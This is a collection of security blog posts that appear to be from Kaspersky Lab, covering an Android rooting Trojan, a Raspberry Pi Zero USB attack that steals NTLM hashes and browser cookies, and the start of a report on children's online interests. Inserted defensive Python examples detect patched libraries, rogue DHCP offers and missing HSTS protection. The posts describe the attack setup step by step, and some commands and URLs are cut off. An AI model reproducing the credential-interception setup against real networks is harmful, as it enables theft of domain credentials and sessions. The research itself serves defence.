All encrypted archives can be divided into two groups: the first comprises Game321.res, Game322.res, Game323.res and Game642.res – and these are used in the initial phase of infection, while the second group: Game324.res and Game644.res, are used in the main phase.

Initial phase

During this phase, the Trojan tries to gain root rights on the device and to install some modules. All archives from this phase contain the same files except for one called “common”. This is a local root exploit pack, and the Trojan uses 4 different exploit pack files, 3 for 32-bit systems and 1 for 64-bit-systems. If these files successfully gain root rights, the Trojan will install several tools into the system. It will also install the malicious app “com.qualcmm.timeservices.”

These archives contain the file “” which has some comments in Chinese:

Part of file

Main phase

In this phase, the Trojan launches the “start” file from Game324.res or Game644.res. It will check the version of Android installed and decide which library should be patched. For Android 4.4.4 and older, the Trojan will patch method _Z30dvmHeapSourceStartupBeforeForkv from, and for Android 5 and newer it will patch method nativeForkAndSpecialize from Both of these libraries are runtime libraries related to Dalvik and ART runtime environments. Before patching, the Trojan will backup the original library with a name bak_{original name}.


During patching, the Trojan will overwrite the existing code with malicious code so that all it can do is execute /system/bin/ip. This could be very dangerous and cause some devices to crash following the overwrite. Then the Trojan will put the patched library back into the system directory. After that, the Trojan will replace the original /system/bin/ip with a malicious one from the archive (Game324.res or Game644.res). In doing so, the Trojan can be sure that its malicious module will be executed with system rights. But the malicious ip file does not contain any methods from the original ip file. This means that all apps that were using this file will lose some functionality or even start crashing.
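The two traces this patching leaves behind, a runtime library whose contents no longer match a known-good build and a bak_{original name} copy sitting beside it, are exactly what an integrity check over a pulled /system/lib directory can catch. The following is an added example written for this post, not code from Kaspersky Lab or from the Trojan; the directory layout, the library names (libruntime.so, libc.so, libmedia.so) and the "patched" contents are constructed for the demo, and the baseline is assumed to have been taken from a clean firmware image of the same device.

```python
"""Added example: baseline-vs-current integrity audit for a directory of
system libraries (e.g. an `adb pull` copy of /system/lib, or the same
directory inside a forensic image), run on an analyst's machine.

It reports the two indicators the post describes:
  * files whose SHA-256 no longer matches a trusted baseline (patched library)
  * files named bak_<original>, the backup the Trojan leaves before overwriting
Library names and file contents below are constructed for the demo.
"""
import hashlib
import os
import tempfile


def sha256_of(path):
    """Stream a file through SHA-256; libraries can be large."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(lib_dir):
    """Record the hash of every regular file. Do this on a known-good image."""
    return {name: sha256_of(os.path.join(lib_dir, name))
            for name in sorted(os.listdir(lib_dir))
            if os.path.isfile(os.path.join(lib_dir, name))}


def audit_lib_dir(lib_dir, baseline):
    """Compare a directory against the baseline.

    Returns a dict with three sorted lists:
      modified   - present in baseline but hash differs (patched in place)
      backups    - bak_* files, the backup copies described in the post
      unexpected - files that were not in the baseline at all
    """
    modified, backups, unexpected = [], [], []
    for name in sorted(os.listdir(lib_dir)):
        path = os.path.join(lib_dir, name)
        if not os.path.isfile(path):
            continue
        if name.startswith("bak_"):
            backups.append(name)
        elif name not in baseline:
            unexpected.append(name)
        elif sha256_of(path) != baseline[name]:
            modified.append(name)
    return {"modified": modified, "backups": backups, "unexpected": unexpected}


def demo():
    """Constructed scenario: take a baseline, then simulate the patching step."""
    with tempfile.TemporaryDirectory() as lib_dir:
        clean = {
            "libruntime.so": b"\x7fELF constructed: original runtime library",
            "libc.so": b"\x7fELF constructed: libc",
            "libmedia.so": b"\x7fELF constructed: media library",
        }
        for name, blob in clean.items():
            with open(os.path.join(lib_dir, name), "wb") as f:
                f.write(blob)
        baseline = build_baseline(lib_dir)

        # What the post describes: back up the original, then overwrite it.
        os.rename(os.path.join(lib_dir, "libruntime.so"),
                  os.path.join(lib_dir, "bak_libruntime.so"))
        with open(os.path.join(lib_dir, "libruntime.so"), "wb") as f:
            f.write(b"\x7fELF constructed: patched, only runs /system/bin/ip")

        return audit_lib_dir(lib_dir, baseline)


if __name__ == "__main__":
    print(demo())
```

The same audit applies to /system/bin, where the post says the original ip binary is replaced outright: that shows up in the modified list rather than as a backup, since no bak_ copy is made there.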

Malicious module “ip”

This file will be executed by the patched system library. It can turn off “VerifyApps” and enable the installation of apps from 3rd party stores by changing system settings. Furthermore, it can grant the “com.qualcmm.timeservices” app Device Administrator rights without any interaction with the user, just by running commands. It is a very unusual way to get Device Administrator rights.

Malicious app com.qualcmm.timeservices

As I mentioned before, in the “initial phase”, the Trojan will install the “com.qualcmm.timeservices” app. Its main purpose is to download archives and execute the “start” binary from them. During the investigation, this app was able to successfully connect to the command and control server, but it received no commands. So I don’t know what kind of files will be executed, but they could be malicious or advertising files.


This Trojan was distributed through the Google Play Store and uses a number of very dangerous techniques, including patching system libraries. It installs malicious modules with different functionality into the system. It looks like its main purpose is to get into the system and execute downloaded files with root rights. But I never received such files from their command and control server.

These malicious modules report to the attackers about every step they are going to make. So I think that the authors are still testing this malware, because they use some techniques which can break the infected devices. But they already have a lot of infected users on whom to test their methods.

I hope that by uncovering this malware at such an early stage, we will be able to prevent a massive and dangerous attack when the attackers are ready to actively use their methods.



50 hashes per hour

Tue, 06/06/2017 - 05:00

How often do you turn off your computer when you go home from work? We bet you leave it on so you don’t have to wait until it boots up in the morning. It’s possible that your IT staff have trained you to lock your system for security reasons whenever you leave your workplace. But locking your system won’t save your computer from a new type of attack that is steadily gaining popularity on Raspberry Pi enthusiast forums.

We previously investigated the security of charging a smartphone via a USB port connection. In this research we’ll be revisiting the USB port – this time in attempts to intercept user authentication data on the system that a microcomputer is connected to. As we discovered, this type of attack successfully allows an intruder to retrieve user authentication data – even when the targeted system is locked. It also makes it possible to get hold of administrator credentials. Remember Carbanak, the great bank robbery of 2015, when criminals were able to steal up to a billion dollars? Finding and retrieving the credentials of users with administrative privileges was an important part of that robbery scheme.

In our research we will show that stealing administrator credentials is possible by briefly connecting a microcomputer via USB to any computer within the corporate perimeter. By credentials in this blogpost we mean the user name and password hash, and we won’t go into detail on how to decipher the retrieved hash or how to use it in pass-the-hash types of attacks. What we’re emphasizing is that the hardware cost of such an attack is no more than $20 and it can be carried out by a person without any specific skills or qualifications. All that’s needed is physical access to corporate computers. For example, it could be a cleaner who is asked to plug “this thing” into any computer that’s not turned off.

We used a Raspberry Pi Zero in our experiments. It was configured to enumerate itself as an Ethernet adapter on the system it was being plugged into. This choice was dictated by the popularity of Raspberry Pi Zero mentions on forums where enthusiasts discuss the possibility of breaking into information systems with single-board computers. This popularity is understandable, given the device capabilities, size and price. Its developers were able to crank the chip and interfaces into a package that is slightly larger than an ordinary USB flash drive.

Yes, the idea of using microcomputers to intercept and analyze network packets or even as a universal penetration testing platform is nothing new. Most known miniature computing devices are built on ARM microprocessors, and there is a special build of Kali Linux that is specifically developed for pen testing purposes.

There are specialized computing sticks that are designed specifically for pen testing purposes, for example, USB Armory. However, with all its benefits, like an integrated USB Type A connector (Raspberry Pi requires an adapter), USB Armory costs much more (around $135) and absolutely pales in comparison when you look at its availability vs. Raspberry Pi Zero. Claims that Raspberry Pi can be used to steal hashes when connected via USB to a PC or Mac surfaced back in 2016. Soon there were claims that Raspberry Pi Zero could also be used for stealing cookies from browsers – something we also decided to investigate.

So, armed with one of the most widespread and available microcomputers at the moment, we conducted two series of experiments. In the first, we attempted to intercept user credentials within the corporate network, trying to connect to laptop and desktop computers running different operating systems. In the second, we attempted to retrieve cookies in a bid to restore the user session on a popular website.

Experiment 1: stealing domain credentials

Methodology

The key principle behind this attack is emulation of the network adapter. We had absolutely no difficulties in finding the module emulating the Ethernet adapter under Raspbian OS (for reference, at the time of writing, we hadn’t found a similar module for Kali Linux). We made a few configuration changes in the cmdline.txt and config.txt files to load the module on boot.

A few extra steps included installing the Python interpreter, the sqlite3 database library and a special app called Responder for packet sniffing:

apt-get install -y python git python-pip python-dev screen sqlite3
pip install pycrypto
git clone

And that wasn’t all – we set up our own DHCP server where we defined the range of IP addresses and a mask for a subnet to separate it from the network we’re going to peer into. The last steps included configuring the usb0 interface and automatic loading of Responder and DHCP server on boot. Now we were ready to rock.
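The DHCP step is what pulls the host onto the device’s private subnet, and it is also where a defender can see the attack: the host receives a DHCPOFFER from a server identifier it has never seen, for an address outside every corporate range, with the same address offered as gateway and DNS. The following is an added example written for this post, not code from Kaspersky Lab, Responder or the Raspberry Pi project: a minimal DHCP parser plus a rogue-offer check of the kind a host agent or network sensor could run (DHCP snooping on a switch, recommended further down, applies the same logic). The trusted server 10.0.0.1, the corporate range 10.0.0.0/16 and the 172.16.31.0/24 “device” subnet are constructed for the demo.

```python
"""Added example: parse DHCP messages and flag offers from an untrusted
server. Packet layout follows RFC 2131/2132 (236-byte BOOTP header, magic
cookie, TLV options). All addresses and the transaction ids are constructed.
"""
import ipaddress
import struct

DHCP_MAGIC = b"\x63\x82\x53\x63"            # RFC 2132 magic cookie
OPT_SUBNET, OPT_ROUTER, OPT_DNS = 1, 3, 6
OPT_MSG_TYPE, OPT_SERVER_ID, OPT_END = 53, 54, 255
MSG_OFFER = 2
_IP_OPTS = {OPT_SERVER_ID: "server_id", OPT_SUBNET: "subnet",
            OPT_ROUTER: "router", OPT_DNS: "dns"}


def _packed(ip):
    return ipaddress.IPv4Address(ip).packed


def build_offer(xid, yiaddr, server_id, subnet, router, dns):
    """Construct a DHCPOFFER the way a server would send it (demo input only)."""
    header = struct.pack(
        "!BBBBIHH4s4s4s4s16s64s128s",
        2, 1, 6, 0,                      # op=BOOTREPLY, htype=Ethernet, hlen=6, hops
        xid, 0, 0,                       # transaction id, secs, flags
        b"\0" * 4, _packed(yiaddr),      # ciaddr, yiaddr (the offered lease)
        b"\0" * 4, b"\0" * 4,            # siaddr, giaddr
        b"\0" * 16, b"\0" * 64, b"\0" * 128)  # chaddr, sname, file
    options = bytes([OPT_MSG_TYPE, 1, MSG_OFFER])
    for code, ip in ((OPT_SERVER_ID, server_id), (OPT_SUBNET, subnet),
                     (OPT_ROUTER, router), (OPT_DNS, dns)):
        options += bytes([code, 4]) + _packed(ip)
    return header + DHCP_MAGIC + options + bytes([OPT_END])


def parse_dhcp(pkt):
    """Return the fields the check needs; raises ValueError on a non-DHCP buffer."""
    if len(pkt) < 240 or pkt[236:240] != DHCP_MAGIC:
        raise ValueError("not a DHCP packet")
    op, _htype, _hlen, _hops, xid = struct.unpack("!BBBBI", pkt[:8])
    fields = {"op": op, "xid": xid,
              "yiaddr": str(ipaddress.IPv4Address(pkt[16:20]))}
    i = 240
    while i < len(pkt):
        code = pkt[i]
        if code == OPT_END:
            break
        if code == 0:                    # pad option has no length byte
            i += 1
            continue
        length = pkt[i + 1]
        value = pkt[i + 2:i + 2 + length]
        i += 2 + length
        if code == OPT_MSG_TYPE and length >= 1:
            fields["msg_type"] = value[0]
        elif code in _IP_OPTS and length >= 4:
            fields[_IP_OPTS[code]] = str(ipaddress.IPv4Address(value[:4]))
    return fields


def check_offer(fields, trusted_servers, corporate_nets):
    """Return a list of findings; an empty list means the offer looks legitimate."""
    findings = []
    if fields.get("msg_type") != MSG_OFFER:
        return findings                  # only offers are judged here
    server = fields.get("server_id")
    if server not in trusted_servers:
        findings.append(f"offer from untrusted DHCP server {server}")
        if fields.get("router") == server or fields.get("dns") == server:
            findings.append("untrusted server also names itself gateway/DNS "
                            "(traffic interception)")
    lease = ipaddress.IPv4Address(fields["yiaddr"])
    if not any(lease in ipaddress.IPv4Network(n) for n in corporate_nets):
        findings.append(f"offered address {lease} is outside corporate ranges")
    return findings


def demo():
    """Constructed: one legitimate offer, one from a device-hosted DHCP server."""
    trusted = {"10.0.0.1"}
    corporate = ["10.0.0.0/16"]
    good = build_offer(0x1234ABCD, "10.0.5.20", "10.0.0.1",
                       "255.255.0.0", "10.0.0.1", "10.0.0.2")
    rogue = build_offer(0x1234ABCE, "172.16.31.10", "172.16.31.1",
                        "255.255.255.0", "172.16.31.1", "172.16.31.1")
    return (check_offer(parse_dhcp(good), trusted, corporate),
            check_offer(parse_dhcp(rogue), trusted, corporate))


if __name__ == "__main__":
    for verdict in demo():
        print(verdict or "offer looks legitimate")
```

On a real host the interesting detail is that the rogue offer arrives on the freshly enumerated USB Ethernet interface, not on the corporate NIC, so an agent that records the receiving interface alongside these findings has everything needed to name the device.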


Just as soon as we connected our “charged” microcomputer to Windows 10, we saw that the connected Raspberry Pi was identified as a wired LAN connection. The Network Settings dialogue shows this adapter as Remote NDIS Internet sharing device. And it’s automatically assigned a higher priority than others.

Responder scans the packets that flow through the emulated network and, upon seeing the username/password hash pairs, directs them to a fake HTTP/HTTPS/NTLM (it supports v1 and v2) server. The attack is triggered every time applications, including those running in the background, send authentication data, or when a user enters them in the standard dialogue windows in the web browser – for example, when user attempts to connect to a shared folder or printer.

Intercepting the hash in automatic mode, which is effective even if the system is locked, only works if the computer has another active local network connection.

As stated above, we tried this proof of concept in three scenarios:

  1. Against a corporate computer logged into a domain
  2. Against a corporate computer on a public network
  3. Against a home computer

In the first scenario we found that the device managed to intercept not only the packets from the system it’s connected to via USB but also NTLM authentication requests from other corporate network users in the domain. We mapped the number of intercepted hashes against the time elapsed, which is shown in the graph below:

Playing around with our “blackbox” for a few minutes, we got proof that the longer the device is connected, the more user hashes it extracts from the network. Extrapolating the “experimental” data, we can conclude that the number of hashes it can extract in our setting is around 50 hashes per hour. Of course, the real numbers depend on the network topology, namely, the amount of users within one segment, and their activity. We didn’t risk running the experiment for longer than half an hour because we also stumbled on some peculiar side effects, which we will describe in a few moments.

The extracted hashes are stored in a plain-text file:

In the second scenario we were only able to extract the connected system’s user credentials: domain/Windows name and password hash. We might have gotten more if we had set up shared network resources which users could try to access, but we’re going to leave that outside the scope of this research.

In the third scenario, we could only get the credentials of the owner of the system, which wasn’t connected to a domain authentication service. Again, we assume that setting up shared network resources and allowing other users to connect to them could lead to results similar to those we observed in the corporate network.

The described method of intercepting the hashes worked on Mac OS, too. When we tried to reach an intranet site which requires entering a domain name, we saw this dialogue warning that the security certificate is invalid.

Now, the interesting side effect we mentioned above was that when the device was connected to a[ny] system in the network, tasks sent out to the network printer from other machines in the same network were put on hold in the printer queue. When the user attempted to enter the credentials in the authentication dialogue window, the queue didn’t clear. That’s because these credentials didn’t reach the network printer, landing in the Raspberry Pi’s flash memory instead. Similar behavior was observed when trying to connect to remote folders via the SMB protocol from a Mac system.

Bonus: Raspberry Pi Zero vs. Raspberry Pi 3

Once we saw that the NTLM systems of both Windows and Mac had come under attack from the microcomputer, we decided to try it against Linux. Furthermore, we decided to attack the Raspberry Pi itself, since Raspbian OS is built on the Debian Wheezy core.

We reproduced the experiment, this time targeting Raspberry Pi 3 (by the way, connecting it to the corporate network was a challenging task in itself, but doable, so we won’t focus on it here). And here we had a pleasant surprise – Raspbian OS resisted assigning the higher priority to a USB device network, always choosing the built-in Ethernet as default. In this case, the Responder app was active, but could do nothing because packets didn’t flow through the device. When we manually removed the built-in Ethernet connection, the picture was similar to that we had observed previously with Windows.

Similar behavior was observed on the desktop version of Debian running on Chromebook – the system doesn’t automatically set the USB Ethernet adapter as default. Therefore, if we connect Raspberry Pi Zero to a system running Debian, the attack will fail. And we don’t think that creating Raspberry Pi-in-the-middle attacks is likely to take off, because they are much harder to implement and much easier to detect.

Experiment 2: stealing cookies

Methodology

While working on the first experiment, we heard claims that it’s possible to steal cookies from a PC when a Raspberry Pi Zero is connected to it via USB. We found an app called HackPi, a variant of PoisonTap (an XSS JavaScript) with Responder, which we described above.

The microcomputer in this experiment was configured just like in the previous one. HackPi works even better at establishing itself as a network adapter because it has an enhanced mechanism of desktop OS discovery: it is able to automatically install the network device driver on Windows 7/8/10, Mac and *nix operating systems. In the first series of experiments, by contrast, an attack could fail on Windows 7, 8 or Vista if the Remote NDIS Internet sharing device didn’t install itself automatically (especially when the PC is locked). And, unlike in the previous series, HackPi never had trouble assigning itself the default network adapter priority under Mac OS either.

What differs from the first experiment is that the cookies are stolen using malicious JavaScript launched from the locally stored web page. If successful, PoisonTap’s script saves the cookies intercepted from sites, a list of which is also locally stored.


If the computer is not locked and the user opens the browser, the JavaScript initiates the redirecting of web requests to a malicious local web page. Then the browser opens the websites from the previously defined list. It is indeed quite spectacular:

If the user does nothing, Raspberry Pi Zero launches the default browser with URL in the address line after a short timeout. Then the process goes ahead as described. However, if the default browser has no cookies in the browser history, the attackers gain nothing.

Among the sites we’ve seen in the list supplied with the script were,,,,,, and over 100 other web addresses. This is what the log of stolen cookies looks like:

We checked the validity of stolen cookies using the website as an example by pasting the info into a clean browser field on other machines and were able to get hold of the user’s account along with all the statistics. On another website belonging to a railroad company vending service, we were able to retrieve the user’s token and take over the user’s account on another computer, because the authentication protocol used only one LtpaToken2 for session identification.

Now this is more serious, because in this case the criminals can get information about previous orders made by the victim, part of their passport number, name, date of birth, email and phone number.

One of the strong points of this attack is that enthusiasts have learned how to automatically install the network device driver on all systems found in today’s corporate environments: Windows 7/8/10, Mac OS X. However, this scenario doesn’t work against a locked system – at least, for now. But we don’t think you should become too complacent; we assume it’s only a matter of time before the enthusiasts overcome this as well. Especially given that the number of these enthusiasts is growing every day.

Also, the malicious web page is blocked by all Kaspersky Lab products, which detect it as Trojan.JS.Poisontap.a. We also assume that this malicious web page will be blocked by the products of all other major anti-malware vendors.


There is already a wide array of single-board microcomputers: from the cheap and universal Raspberry Pi Zero to computing sticks specifically tuned for penetration testing, which cannot be visually differentiated from USB flash drives. To answer the main question of just how serious this threat is, we can say that at the moment it is overrated. However, we don’t advise underestimating the capabilities of IoT enthusiasts and it’s better to assume that those obstacles which we discovered in our experiment, have already been overcome.

Right now we can say that Windows PCs are the systems most prone to attacks aimed at intercepting the authentication name and password with a USB-connected Raspberry Pi. The attack works even if the user doesn’t have local or system administrator privileges, and can retrieve the domain credentials of other users, including those with administrator privileges. And it works against Mac OS systems, too.

The second type of attack that steals cookies only works (so far) when the system is unlocked, which reduces the chances of success. It also redirects traffic to a malicious page, which is easily blocked by a security solution. And, of course, stolen cookies are only useful on those websites that don’t employ a strict HTTP transport policy.


However, there are a number of recommendations we’d like to give you to avoid becoming easy prey for attackers.


1. Never leave your system unlocked, especially when you need to leave your computer for a moment and you are in a public place.

2. On returning to your computer, check to see if there are any extra USB devices sticking out of your ports. See a flash drive, or something that looks like a flash drive? If you didn’t stick it in, we suggest you remove it immediately.

3. Are you being asked to share something via external flash drive? Again, it’s better to make sure that it’s actually a flash drive. Even better – send the file via cloud or email.

4. Make a habit of ending sessions on sites that require authentication. Usually, this means clicking on a “Log out” button.

5. Change passwords regularly – both on your PC and the websites you use frequently. Remember that not all of your favorite websites may use mechanisms to protect against cookie data substitution. You can use specialized password management software for easy management of strong and secure passwords, such as the free Kaspersky Password Manager.

6. Enable two-factor authentication, for example, by requesting login confirmation or with a hardware token.

7. Of course, it’s strongly recommended to install and regularly update a security solution from a proven and trusted vendor.


1. If the network topology allows it, we suggest using solely the Kerberos protocol for authenticating domain users. If, however, there is a demand for supporting legacy systems with LLMNR and NTLM authentication, we recommend breaking down the network into segments, so that even if one segment is compromised, attackers cannot access the whole network.

2. Restrict privileged domain users from logging in to the legacy systems, especially domain administrators.

3. Domain user passwords should be changed regularly. If, for whatever reason, the organization’s policy does not involve regular password changes, please change the policy. Like, yesterday.

4. All of the computers within a corporate network have to be protected with security solutions and regular updates should be ensured.

5. In order to prevent the connection of unauthorized USB devices, it can be useful to activate a Device Control feature, available in the Kaspersky Endpoint Security for Business suite.

6. If you own the web resource, we recommend activating HSTS (HTTP Strict Transport Security), which prevents switching from HTTPS to HTTP and spoofing the credentials from a stolen cookie.

7. If possible, disable the listening mode and activate the Client (AP) isolation setting in Wi-Fi routers and switches, disabling them from listening to other workstations’ traffic.

8. Activate the DHCP Snooping setting to protect corporate network users from capturing their DHCP requests by fake DHCP servers.

Last, but not least, you never know if your credentials have been leaked from a site you’ve been to before – online or physical. Thus, we strongly recommend that you check your credentials on the HaveIbeenPwned website to be sure.
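Recommendation 6 above, and the earlier observation that stolen cookies are only useful on sites without a strict transport policy, can be checked from the outside by reading a site’s response headers. The following is an added example for this post, not code from Kaspersky Lab or from any of the sites tested: it audits a raw HTTP response for a Strict-Transport-Security header with an adequate max-age and includeSubDomains, and for session cookies missing the Secure and HttpOnly attributes. The two responses inside are constructed; the cookie name LtpaToken2 is taken from the post, the values are made up.

```python
"""Added example: audit raw HTTP response headers for the two controls that
blunt cookie theft via a forced HTTP redirect: HSTS on the site, and
Secure/HttpOnly on the session cookie. Sample responses are constructed.
"""

MIN_HSTS_AGE = 31536000  # one year, a common minimum for HSTS max-age


def parse_response_headers(raw):
    """Split a raw HTTP/1.x response into (status line, [(name, value), ...])."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def parse_hsts(value):
    """Turn 'max-age=63072000; includeSubDomains' into a directive dict."""
    directives = {}
    for part in value.split(";"):
        part = part.strip()
        if not part:
            continue
        if "=" in part:
            key, val = part.split("=", 1)
            directives[key.strip().lower()] = val.strip().strip('"')
        else:
            directives[part.lower()] = True
    return directives


def parse_cookie_attrs(set_cookie):
    """Return (cookie name, set of lower-cased attribute names)."""
    parts = [p.strip() for p in set_cookie.split(";")]
    name = parts[0].split("=", 1)[0]
    attrs = {p.split("=", 1)[0].lower() for p in parts[1:] if p}
    return name, attrs


def audit_response(raw):
    """Return a list of findings; empty means both controls are in place."""
    findings = []
    _status, headers = parse_response_headers(raw)

    hsts_values = [v for n, v in headers if n == "strict-transport-security"]
    if not hsts_values:
        findings.append("no Strict-Transport-Security header")
    else:
        directives = parse_hsts(hsts_values[0])
        try:
            max_age = int(directives.get("max-age", 0))
        except ValueError:
            max_age = 0
        if max_age < MIN_HSTS_AGE:
            findings.append(f"HSTS max-age {max_age} is below {MIN_HSTS_AGE}")
        if "includesubdomains" not in directives:
            findings.append("HSTS lacks includeSubDomains")

    for name, value in headers:
        if name == "set-cookie":
            cookie, attrs = parse_cookie_attrs(value)
            if "secure" not in attrs:
                findings.append(f"cookie {cookie} lacks Secure")
            if "httponly" not in attrs:
                findings.append(f"cookie {cookie} lacks HttpOnly")
    return findings


def demo():
    """Constructed responses: one like the vending site described, one hardened."""
    weak = ("HTTP/1.1 200 OK\r\n"
            "Content-Type: text/html\r\n"
            "Set-Cookie: LtpaToken2=constructed-token-value; Path=/\r\n"
            "\r\n<html></html>")
    hardened = ("HTTP/1.1 200 OK\r\n"
                "Strict-Transport-Security: max-age=63072000; includeSubDomains\r\n"
                "Set-Cookie: LtpaToken2=constructed-token-value; Path=/; "
                "Secure; HttpOnly; SameSite=Lax\r\n"
                "\r\n<html></html>")
    return audit_response(weak), audit_response(hardened)


if __name__ == "__main__":
    for verdict in demo():
        print(verdict or "both controls present")
```

The two controls cover different steps of the attack described above: a cookie marked Secure is never sent on the plain-HTTP request the injected page provokes, and HSTS stops the browser from making that HTTP request in the first place.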

What Interests Children Online

Thu, 06/01/2017 - 07:02

Today’s children and teenagers are integrated into cyberspace so tightly that discussions on the outright prohibition of using devices with Internet connectivity are nonsensical. It is more reasonable to teach children how to behave themselves correctly online and lend support by protecting them against undesirable content. To solve these problems, many parents use dedicated software to protect their children online. The software not only restricts access to undesirable websites but also warns about any danger that the parents want to know about (for example, what their child is searching for on the Internet or to whom he or she is talking) and offers recommendations on what to do in each specific situation.

The Kaspersky Lab software line includes a Parental Control module, which is responsible for the safety of children online and is available as part of security products or as a stand-alone solution called Kaspersky Safe Kids. In order to recognize relevant threats, the products collect anonymous statistics about potentially dangerous content that a child encounters. As part of this report, we analyze the collected data in our quest for the answer to the question of what interests the current generation of children online.

How statistics are collected

Kaspersky Lab solutions scan the content of web pages that a child attempts to visit. If a website falls within one of the fourteen undesired categories, the module sends a notification in the Kaspersky Security Network (no personal user data are sent, and privacy is not violated). There are two important points that should be noted:

  • Each parent chooses the content categories that he or she wishes to ban and appropriately configures the security solution. However, anonymous statistics will be collected for all fourteen categories.
  • The data were collected only from computers running a Windows OS or a Mac OS, and statistics for mobile devices are not included in this report.

Currently, web filtering in the products that have the Parental Control feature is performed for the categories listed below:

  • Internet communication media (social networks, messengers, chats, and forums)
  • Adult content
  • Alcohol, tobacco, narcotics
  • Violence
  • Weapons, explosives, pyrotechnics
  • Profanity
  • Gambling, lotteries, sweepstakes
  • Computer games
  • Electronic commerce
  • Software, audio, video
  • HTTP query redirection
  • Recruitment
  • Religions, religious associations
  • News media

Out of the entire list, we have chosen the seven most popular categories, according to our statistical data. The remaining categories make up an insignificant number of triggered events (amounting to 0.84% worldwide). Therefore, we won’t be focusing on them today.

The world map

First of all, we will review which categories are the most popular among children across the globe (by the percentage of users visiting websites in the relevant category out of the total number of global users of the Parental Control module and the Safe Kids product).

The Percentage Breakdown of Notifications from the Parental Control Module and the Safe Kids Product for 14 Categories, May 2016–May 2017

This breakdown of category popularity shows that communication via social networks, messengers, and chats is still the main pastime of children when they are online. It might come as a shock that children have been increasingly interested in the “Alcohol, tobacco, narcotics” category (14.13% against 9.12% in last year’s report), which pushed “Computer games” to third place. The “Software, audio, video” category (6.23%) switched places with the “Electronic commerce” category (4.45%), yielding fourth place.

These data reflect the map of the world at large. Regionally, the situation may vary; and it does indeed vary. Let us review at length what interests children around the world and try to figure out what may be the cause of these interests.

Regional differences

For the study, we have selected six categories out of the list of the most popular ones. We decided not to take into account the “Profanity” category, as this content may be encountered on any website and it does not represent a separate interest for a child.

We have selected the following seven regions for comparison (the languages of all of the countries listed below are supported by Kaspersky Lab’s child safety software):

  • North America (USA and Canada);
  • Western Europe (Austria, Belgium, Great Britain, Ireland, Germany, Liechtenstein, Luxembourg, Monaco, France, Switzerland, Denmark, Sweden, Spain, and Italy);
  • The CIS (Russia, Belarus, and Kazakhstan);
  • Latin America (Argentina, Brazil, Haiti, Guatemala, Honduras, the Dominican Republic, Colombia, Mexico, Panama, Uruguay, Chile, Ecuador, Puerto Rico, and Venezuela);
  • Asia (China, Singapore, Hong Kong, Macao, Taiwan, Japan, and Korea);
  • The Arab world (Algeria, Bahrain, Djibouti, Egypt, Iran, Iraq, Jordan, Kuwait, Libya, Sudan, Tunisia, the UAE, Yemen, and Saudi Arabia);
  • Oceania (Australia and New Zealand).

Here is the breakdown of interests by region.

The Results for the Top 6 Website Categories in Various Regions, May 2016–May 2017

In Western Europe, North America, and Oceania, children visit social networks and communicate via messengers almost as often as they navigate to websites with content devoted to tobacco, alcohol, and drugs. In the Arab countries, children visit social networks from their computers more often than other children in the world. In Asia, children show more interest in pornographic websites and online purchases than other children in the world.

The interests of children from the CIS countries and Latin America are very similar: online communication is prevalent, but its percentage is a bit lower in the CIS countries. Alcohol and tobacco follow far behind social networks and take second place in the preferential rating for these regions. Computer games took third place.

Let’s see what causes this situation by individually reviewing each of the six categories.

Differences by country

In order to understand how such a breakdown of interests forms in children of different regions, we have taken several countries from each part of the world and reviewed them in detail for each of the six popular categories. Just as in the comparative charts above, we took the percentage of users who visited websites within a specific category out of the total number of users of the Parental Control module and the Safe Kids product.

Let’s start with the “Internet communication media” category, which holds first place in the rankings.

Internet communication media

Starting from last year, there has been a noticeable declining trend in the popularity of using social networks from a computer. For example, the number of instances of visiting social-network pages has decreased by more than 10% in Great Britain and by nearly 15% in the USA. We have already explained that using social networks is more convenient with smartphones, as this allows a person to be online 24/7.

The Popularity of the “Internet Communication Media” Category in Various Countries, May 2016–May 2017

Yet, in some countries where the mobile Internet is not so well-developed or where parents are holding off on buying a smartphone for their child for various reasons, the communication platform is still a personal computer.

We can see that the lowest percentage of visits to social networks from a personal computer can be seen in Great Britain (20.57%), China (26.11%), the USA (27.68%), and Germany (28.49%). The highest percentage is in Egypt (88.12%), followed by Saudi Arabia (82.99%) and Mexico (77.70%), where children still prefer to communicate via a computer.

The most popular social networks among children in different regions are Facebook, Twitter, Pinterest, Google+, and, curiously enough, Instagram, even though it is fully focused on mobile devices, as the service does not support the ability to publish pictures from a computer (only with the help of third-party websites and applications).

The Percentage Breakdown of Global Social Network Popularity in Different Regions, May 2016–May 2017 (the percentage of the total number of users of five social networks)

Nearly every region shows a bias towards Facebook out of all of the globally popular social networks. There are countries where regional social networks are more popular. For example, in China the microblogging service Sina Weibo and the social network Kaixin001 are much more popular than their western competitors.

The Percentage Breakdown of Popularity of Social Networks in China, May 2016–May 2017 (compared to the five popular social networks that were chosen)

However, in Japan, even with the existence of its own large and popular social network Mixi, children who have Kaspersky Lab’s Parental Control installed show preference in using Twitter and Facebook.

The Percentage Breakdown of Popularity of Social Networks in Japan, May 2016–May 2017 (compared to the five popular social networks that were chosen)

In Russia, children generally use domestic social networks, such as Vkontakte and Odnoklassniki.

The Percentage Breakdown of Popularity of Social Networks in Russia, May 2016–May 2017 (compared to the five popular social networks that were chosen)

Social networks and messengers are very convenient means of communicating, meeting new people, and exchanging information. Many social networks are not limited to these functions and also have functions for listening to music, watching videos, and even buying or selling items. At the same time, almost all of the content that is published on social networks is created by users themselves. There are threats and dangers associated with that, and they may affect children who are unprepared for this harsh social environment.

There are two types of threats on a social network: content-related and social. Content threats are posts and communities that contain, for example, pornography, depictions of violence or information about drugs. Social threats include cyberbullying, trolling, sexting and sextortion, and psychological manipulation by recruiters for cults who exploit children's trust to fill their ranks. Swindlers who hunt for financial profit and use children to steal money from their parents belong here too.

All of the dangers can be avoided if parents monitor what their child is interested in and to whom he or she is talking not only in everyday life but on social networks as well. Parents should explain to their child the rules of conduct, which are relevant not only for public places but for digital social environments as well, since they too are, after all, public places. Leading developers of tools for protecting children on the Internet endeavor to make the social-network environment more transparent to parents, and we are no exception.

Alcohol, tobacco, narcotics

The next category that we are going to review is one that has been gaining popularity among children: “Alcohol, tobacco, narcotics”.

The Popularity of the “Alcohol, Tobacco, Narcotics” Category in Various Countries, May 2016–May 2017

